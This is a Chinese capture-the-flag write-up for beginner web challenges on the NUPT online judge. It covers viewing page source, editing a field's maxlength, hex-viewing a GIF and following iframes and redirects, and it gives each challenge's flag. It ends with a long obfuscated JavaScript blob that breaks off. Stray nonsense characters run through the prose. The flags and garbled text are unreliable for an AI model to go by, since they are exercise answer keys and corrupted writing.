[南郵OJ]Web

簽到2

地址：來源：網(wǎng)絡(luò)攻防大賽

說了輸入zhimakaimen奸鸯，開始輸入沒認(rèn)真看，只能輸入10個(gè)數(shù)字跺株，可是zhimakaimen是十一個(gè)字符复濒，后來審查元素才發(fā)現(xiàn)的。
修改maxlength就可以了
flag is:nctf{follow_me_to_exploit}

這題不是WEB

真的乒省，你要相信我巧颈！這題不是WEB
傳送門：題目地址.

是一個(gè)gif動(dòng)圖，下載下來用01editor打開袖扛，拉到最后砸泛。
nctf{photo_can_also_hid3_msg}

層層遞進(jìn)

黑客叔叔p0tt1的題目
歡迎大家關(guān)注他的微博~
題目傳送門:題目地址

是個(gè)網(wǎng)頁十籍，懵逼，查看源代碼咯唇礁。

<pre id="line1"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html xmlns="http://www.w3.org/1999/xhtml">  <head>  <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  <title>SuperSo | by:p0tt1</title>  <meta name="keywords" content="SuperSo | by:p0tt1">  <meta name="Description" content="SuperSo | by:p0tt1" />  <!-- css,js -->  <style type="text/css"> *{margin:0;padding:0;}
body{background:#FFFFFF;font-size:12px;font-family:"微軟雅黑";#666}

.course{width:1024px;height:680px;margin:30px auto;}
.course .course_box{width:255px;height:155px;background:#FFCC66;float:left;margin-left:1px;
    cursor:pointer;margin-bottom:20px;color:#fff;position:relative;
}
.course .course_box h3{font-size:24px;font-weight:300;text-align:center;margin-top:63px;}
.course .course_box p{width:255px;height:155px;position:absolute;left:0;top:0;padding:10px;background:#000;opacity:0.5;
                        filter:alpha(opacity=50);display:none;  
}
.course .course_box p span{display:block;margin-top:2px;padding:2px;}
.course .course_box p .course_title{font-size:22px;}
.course .tz_blue{background:#2d8af1;}
.course .tz_red{background:#D44825;}
.course .tz_gray{background:#666;}
.course .tz_org{background:#ff6e1a;}
.course .tz_lv{background:#0cc5e7;}
.course .tz_qing{background:#64d500;}
.course .tz_yellow{background:#d5c300;} 
.course .tz_blue{background:#2d8af1;}
.course .tz_bluees{background:#2a45f1;}
.course .tz_redd{background:#D44835;}
.course .tz_grayy{background:black;}
.course .tz_orgg{background:#ff6e4a;}
.course .tz_lvv{background:#0cc5a7;}
.course .tz_qingg{background:#64c500;}
.course .tz_yelloww{background:#d45300;}
.course .tz_bluee{background:#2ddff1;} 
</style>  
<link href="[css/animate.min.css](view-source:http://chinalover.sinaapp.com/web3/css/animate.min.css)" rel="stylesheet" type="text/css">
</link>  
</head>  
<body>  
<body style="overflow:auto;">  
<iframe runat="server" src="[SO.html](view-source:http://chinalover.sinaapp.com/web3/SO.html)" width="100%" height="237" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>  
<iframe runat="server" src="[http://www.lunzhiyu.com](view-source:http://www.lunzhiyu.com/)" width="100%" height="3800" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe> 
</body>  
</html>
</pre>

代碼里有個(gè)iframe比較顯眼勾栗，而且他的屬性值也很奇怪，不是0就是no盏筐，想到題目層層遞進(jìn)围俘，相比信息都藏在iframe里面的src吧，嘗試點(diǎn)iframe里的src琢融，嘗試發(fā)現(xiàn)界牡，只有第一個(gè)S0.html有信息，第二個(gè)iframe的http://www.lunzhiyu.com沒有信息漾抬，于是一直點(diǎn)進(jìn)去第一個(gè)iframe宿亡。
多次點(diǎn)擊之后，得到：

<pre id="line1"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">  <HTML><HEAD><TITLE>有人偷偷先做題纳令，哈哈飛了吧挽荠？</TITLE>  <META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">  <STYLE type="text/css"> BODY { font: 9pt/12pt 宋體 }
  H1 { font: 12pt/15pt 宋體 }
  H2 { font: 9pt/12pt 宋體 }
  A:link { color: red }
  A:visited { color: maroon } </STYLE>  </HEAD><BODY>  <center>  <TABLE width=500 border=0 cellspacing=10><TR><TD>  <!-- Placed at the end of the document so the pages load faster -->  <!--  
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->  
<p>來來來，聽我講個(gè)故事：</p>  
<ul>  
<li>從前平绩，我是一個(gè)好女孩圈匆，我喜歡上了一個(gè)男孩小A。</li>  
<li>有一天馒过，我終于決定要和他表白了臭脓！話到嘴邊，鼓起勇氣... </li>  
<li>可是我卻又害怕的<a href="javascript:history.back(1)">后退</a>了腹忽。嗤放。贰拿。</li>  
</ul>  <h2>為什么？
<br>為什么我這么懦弱右蒲？</h2>  
<hr>  
<p>最后葫录，他居然向我表白了着裹，好開森...說只要騙足夠多的笨蛋來這里聽這個(gè)蠢故事浪費(fèi)時(shí)間，</p>  
<p>他就同意和我交往米同！</p>  
<p>謝謝你給出的一份支持骇扇！哇哈哈\(^o^)/~！</p>  
</TD></TR></TABLE>  
</center>  
</BODY></HTML></pre>

仔細(xì)看js代碼面粮，藏的夠深的啊少孝。

nctf{this_is_a_fl4g}
后記：
抓包或者查看元素的網(wǎng)絡(luò)可以看到404.html，打開查看源碼即可熬苍。

單身二十年

這題可以靠技術(shù)也可以靠手速稍走！
老夫單身二十年袁翁，自然靠的是手速！
題目地址：擼了他婿脸！

點(diǎn)進(jìn)去發(fā)現(xiàn)有頁面跳轉(zhuǎn)了,頁面顯示：
這里真的沒有KEY粱胜，土土哥哥說的，土土哥哥從來不坑人狐树，PS土土是閏土焙压，不是譚神
查看首頁源碼：view-source:http://chinalover.sinaapp.com/web8/

<pre id="line1"><html>  
<head>  
<meta http-equiv="content-type" content="text/html;charset=utf-8">  
</head>  
<body>  
<a href="[./search_key.php](view-source:http://chinalover.sinaapp.com/web8/search_key.php)">_到這里找key__</a>  
</body>  
</html>
</pre>

點(diǎn)進(jìn)去./search_key.php

<script>window.location="./no_key_is_here_forever.php"; </script>
key is : nctf{yougotit_script_now}
- nctf{yougotit_script_now}
___

綜合題

題目地址：tip:bash

打開發(fā)現(xiàn)是jsfuck碼
呀！這到底是什么玩意兒
[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]](({}[[]]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+({}[[]]+[])[!![]+!![]])+(!![]+[])[!![]+!![]+!![]]+({}[[]]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(!![]+[])[+!![]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+(+!![]+[])+({}+[])[!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(![]+[])[+!![]]+(![]+[])[+!![]]+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+[])+(![]+[])[+[]]+({}[[]]+[])[!![]+!![]]+(!![]+!![]+!![]+[]